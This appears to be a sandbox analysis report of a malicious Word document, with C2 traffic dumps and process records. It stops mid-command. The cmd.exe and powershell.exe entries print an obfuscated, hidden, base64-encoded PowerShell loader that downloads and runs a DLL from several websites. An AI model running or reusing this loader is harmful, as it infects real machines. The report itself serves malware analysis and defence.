Jan 25, 2021 11:20:44.006206036 CET	11	IN	Data Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Jan 25, 2021 11:20:44.006243944 CET	13	IN	Data Raw: 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Jan 25, 2021 11:20:44.006269932 CET	14	IN	Data Raw: 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
Jan 25, 2021 11:20:44.147989988 CET	15	IN	Data Raw: 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 Data Ascii: +p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	84.232.229.24	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2021 11:21:50.546128035 CET	435	OUT	POST /v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ HTTP/1.1 DNT: 0 Referer: 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ Content-Type: multipart/form-data; boundary=--------------9AYnZdeXqkvt9n User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 84.232.229.24 Content-Length: 5972 Connection: Keep-Alive Cache-Control: no-cache
Jan 25, 2021 11:21:50.546320915 CET	437	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 41 59 6e 5a 64 65 58 71 6b 76 74 39 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 7a 50 50 64 44 70 5a 74 47 74 Data Ascii: ----------------9AYnZdeXqkvt9nContent-Disposition: form-data; name="zPPdDpZtGthZZLZTN"; filename="yUGCleTdVM"Content-Type: application/octet-stream-vFS;ooY8[fD\k%kkr_X-1YdDuB)JY
Jan 25, 2021 11:21:50.594491959 CET	441	OUT	Data Raw: 14 9b 5f 0c f1 9f bf 99 e7 f1 3f ec 29 52 ff aa b3 e5 94 ae e1 2e f1 69 f7 93 43 eb b6 1d cc ff 60 05 a3 95 d7 07 f7 2e 0b 4e 26 eb 92 ec 5e ff e1 e5 e4 9d 72 5e 3c 4c 0d a9 0d 76 e9 a1 0f fa 64 54 6a 64 e6 a8 38 4d 8c 85 d0 f7 2e 61 b4 78 93 74 Data Ascii: _?)R.iC`.N&^r^<LvdTjd8M.axtl=kSV63?"vpn;sXETPDwB+:9pfE1K#@#k!f9x$BW;q\|0\MLgI'n02:Bm )Wy7ZF*
Jan 25, 2021 11:21:50.643062115 CET	441	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2021 11:21:50.998769999 CET	443	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Jan 2021 10:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 66 66 34 0d 0a b6 db 56 64 a5 b6 a1 89 67 d0 d9 b1 ee 3a a1 64 b3 71 5b fa 5d 39 e5 10 75 b3 4c 3c c7 15 83 84 0c 24 bd d8 11 42 74 1a 56 df a6 b0 99 36 49 73 c3 da 14 43 a0 41 67 33 16 f7 57 df bc 6d af b1 f7 7e ec dd 30 f8 48 13 73 31 93 f5 f0 8b 45 1a dd 26 1a a6 e3 56 f7 69 4b 7c ee 2a 99 bd 67 4d 38 ee 9f 31 6a 39 fe 94 ea aa 91 da da 4e bd 07 4d 7b 45 9f 56 12 6a a1 8b 4d 5b 79 ee 3d 2d 43 f2 c8 a4 0d 93 3f 85 a8 2d 6e c6 49 53 06 09 b5 3c f8 3b 47 26 f7 66 83 65 ab 00 fa 53 37 08 4e 7c 48 78 a7 3d 89 da 2f b1 3d 5c 56 9c d4 94 60 2c 59 97 41 5d c8 35 1e be f2 3e 58 03 1d 2e ff 31 86 1f 22 05 49 37 90 72 6b 68 02 42 15 63 1f c9 e3 76 18 ec 69 f4 e3 ed 0c 03 f5 0d 94 57 59 bc 58 e7 aa f0 50 5d 4a 14 aa 48 6b 62 46 55 5a a5 48 7f 43 37 2f c0 d5 b5 ad 7a 62 a3 40 84 a9 6d 9e 3a 7e 63 9d cb e7 45 fd f5 f4 c7 e4 94 68 4d 76 69 d6 0f d6 95 e1 c2 40 6c 8b da 99 c7 0b fd 02 32 2c 9c d7 9b e1 17 97 eb 29 ca b1 e2 f4 34 4d 6c 8b 57 08 f4 8c 8e 94 a9 27 bb 1c f0 ae 7f 83 c6 00 49 18 0d 30 7f af 50 a0 aa 9e 35 e3 9a f6 54 a7 49 16 7d 62 b1 9d 93 41 ff 2c ac 1e c2 85 58 7c 75 bd 19 a5 9e cf fa 9a 2e e5 58 2f e3 a6 d4 8b cd 72 16 f5 a6 51 ce 6a 66 dc e8 98 2f db 82 05 3e 8f cc d8 23 89 1c 56 93 ed bb 4e 60 bd fe af 07 8c d0 35 74 a4 b6 24 a5 11 69 e3 73 88 46 e3 7e 71 db ee 6d 39 60 be 87 68 a4 c0 09 6a 29 ab 26 37 2d ca 4d 44 a8 57 3e 20 c1 e3 18 cd c4 56 36 00 7d d7 ca 20 64 48 f6 be b2 d0 d8 ab b8 c2 bc fb fc 83 b7 3e 86 9f 4d 7b 46 6b aa f4 ec 05 f7 81 f6 24 d3 56 bd d7 f4 c6 12 dc 63 2e de fa 9e c9 9c 05 a7 6c 97 96 de c7 d3 9c 40 58 f0 c3 8d a2 17 00 df 4d 92 e5 85 50 d2 ba 11 ba df 91 ab 71 34 82 ea f3 3d b6 6f 59 f2 1d 03 72 02 ec 57 cf d0 40 f3 7e 6b 46 67 45 b1 50 e2 3b f6 4c e0 91 63 f3 70 e8 e7 7e 9e 56 4e 3b 68 6b 5a 58 4c dd 89 87 52 8e 01 2f 2d db 82 19 3c f5 0b a4 05 6c 78 da 90 32 02 1a 51 c3 5c 81 ab 71 0e 74 26 d6 5c d1 cd 6e 43 7f b3 c7 8c 10 cf 63 42 e9 7c 78 d6 93 3e bb aa ff b2 3f de 97 bd 06 83 4f 20 0c 20 a9 38 ef 3f f8 6b 6d 9e b4 a4 55 d1 90 cf 2f 5f 7c bc e0 cf 08 fd 82 2c e3 cd cb 0a 41 26 2f 86 70 2f 0b 26 d8 eb 7f 3e 9f 9e ea 4a 62 f5 16 9c c6 ce cf e9 45 e3 ca 0c e3 fb df 68 fb a8 88 15 f3 42 58 5d 4b 32 62 c6 2e 40 96 84 b3 a0 c9 16 22 ed fe d7 03 1b 7f a2 b1 4c a6 f5 71 d3 38 89 f0 9c 34 26 c3 db c5 ff 0c a6 6d d0 c9 34 60 17 41 d7 eb bc 77 bf d0 72 4a ba 4f d5 15 e1 9d 19 8b 55 bf 77 22 98 39 d1 57 0f cd 51 1e 6b a3 c8 bd 9e 82 37 0a 9c e0 52 5e aa a7 12 f6 4a ec 31 1d a4 13 64 e0 d4 40 da 71 57 9f 04 5c 80 4f 99 64 6a 84 a7 ee cf 7a a7 75 45 d5 4b f0 fe 7a 8d ba 58 c1 8f 38 b7 ee ce 30 56 fb d0 14 44 91 bd a8 db 97 e2 dc 53 3d 26 ac b4 3c dc e4 07 34 49 be 36 2a 21 d7 af 71 69 d4 73 ee 70 3c a1 21 63 fa f7 0b 6d 75 dc e8 12 b7 6f ba 98 d8 a2 93 79 71 74 6f 9e e2 2a 41 43 b6 4e 3e 0e 2a 8d a0 25 60 d7 6e 9a 3a 8e fd 55 f2 61 7a f3 d1 b8 05 96 fe cc f6 15 d8 08 81 01 10 10 58 51 a5 8c 94 6e 14 b9 c0 e9 e2 fb c1 33 5d 13 0f db bf af c7 84 e0 c6 13 78 c4 99 b7 63 97 f7 6b ee a9 8d 98 5b 2c 4f d5 0b 4b e0 0b b5 25 88 02 ac 93 b5 29 62 0b ef 80 e4 d5 ab 42 b3 93 ef fe 85 32 7e dd b9 5f f2 ee dc ee fa fc 2f c9 08 bc 6e 10 1a 0a 19 a5 25 1b a9 29 2d c0 e4 02 bf a5 ae e8 3d 62 8d b0 50 a3 19 2c 59 c3 6b 31 98 c6 7f 5f 1f 3e f5 2d 97 71 2c 62 1a 8b c7 a1 3f 5d 29 08 70 3c 67 5a 31 e6 60 86 36 83 8d 20 bb bf 38 8c 0a 33 ea 8a 4d 32 a4 08 5f ee 57 a2 41 a2 22 07 2d fa 3c 2a da 40 64 99 b3 66 29 9a 1f 55 0e 76 7f 3b 44 30 3f 96 f9 8d 24 ac 11 5e e2 3e d9 2f d5 c0 99 88 fa 32 fd Data Ascii: ff4Vdg:dq[]9uL<$BtV6IsCAg3Wm~0Hs1E&ViK\|gM81j9NM{EVjM[y=-C?-nIS<;G&feS7N\|Hx=/=\V`,YA]5>X.1"I7rkhBcviWYXP]JHkbFUZHC7/zb@m:~cEhMvi@l2,)4MlW'I0P5TI}bA,X\|u.X/rQjf/>#VN`5t$isF~qm9`hj)&7-MDW> V6} dH>M{Fk$Vc.l@XMPq4=oYrW@~kFgEP;Lcp~VN;hkZXLR/-<lx2Q\qt&\nCcB\|x>?O 8?kmU/_\|,A&/p/&>JbEhBX]K2b.@"Lq84&m4`AwrJOUw"9WQk7R^J1d@qW\OdjzuEKzX80VDS=&<4I6!qisp<!cmuoyqtoACN>%`n:UazXQn3]xck[,OK%)bB2~_/n%)-=bP,Yk1_>-q,b?])p<gZ1`6 83M2_WA"-<*@df)Uv;D0?$^>/2
Jan 25, 2021 11:21:51.004179001 CET	444	IN	Data Raw: 8a 2d 04 eb ae 5b 88 36 97 c0 da 22 41 10 3f 58 3d 3e cf 6e 2b b8 45 39 70 68 cd f1 9e c6 6f 48 cf 07 6e 8f 36 79 00 c8 ba 37 87 49 32 e4 bb 32 63 d8 28 7d e1 09 d0 bd 0a 01 48 f7 bf 50 b4 42 1b de 79 9f 77 d9 fe d6 a0 11 b1 fd 83 6b 19 8f a5 5c Data Ascii: -[6"A?X=>n+E9phoHn6y7I22c(}HPBywk\r:sqV^<wPE%LuU8ApW_x.cbi\|%z>2uEi%SYH\|CAgMd=\|C9B1353C'eW:_:"j{*UIP8eRIn@Z
Jan 25, 2021 11:21:51.048567057 CET	445	IN	Data Raw: d8 a5 14 b6 fb e3 ac 5f 2b 41 4c fe fe 82 c2 cb bb 56 5d 01 b3 15 45 b1 e9 dc 6f 93 01 94 07 7e 81 06 d6 e9 6a dc f6 53 cc ec 6c 84 3e d0 a4 1e 1b d1 e4 9f 3f 24 1a 26 bf 06 17 f0 8c b6 c8 13 b8 6a c6 5b 54 6c bd a7 83 d6 63 68 09 f9 ff ee 83 2c Data Ascii: _+ALV]Eo~jSl>?$&j[Tlch,sZ?5D\fNmw1g.tA}.eTM_02JA9'.#Y41wF5u,r`cwO'8YsMY3Oo"@^gk%zO Q:
Jan 25, 2021 11:21:51.051424026 CET	446	IN	Data Raw: 4f 37 58 2f 93 50 4e 06 68 ae d1 6a f0 ed bf 9e 8a f3 1c 3a 8d 15 05 ef 7c 44 17 ba 66 71 06 25 5a d6 a6 a3 20 e2 8e a0 00 34 1d c9 d5 be fb b6 54 51 80 4d f6 c1 cc 3b 0b 51 2c ee cb 74 75 d2 cd 17 05 14 9e d0 0e 90 f9 d8 51 75 4a 6a a6 68 0e d6 Data Ascii: O7X/PNhj:\|Dfq%Z 4TQM;Q,tuQuJjh?4fvwdp Ubbvmri#sAk\uXwSmUlRPX8dUX!7b'YwlL4~j$tWw3>^jiC1L\|W3K=

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2416 Parent PID: 584

General

Start time:	11:20:33
Start date:	25/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f5a0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2376 Parent PID: 1220

General

Start time:	11:20:35
Start date:	25/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
Imagebase:	0x4a1c0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2496 Parent PID: 2376

General

Start time:	11:20:35
Start date:	25/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xffd00000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2308 Parent PID: 2376

General

Start time:	11:20:36
Start date:	25/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8AL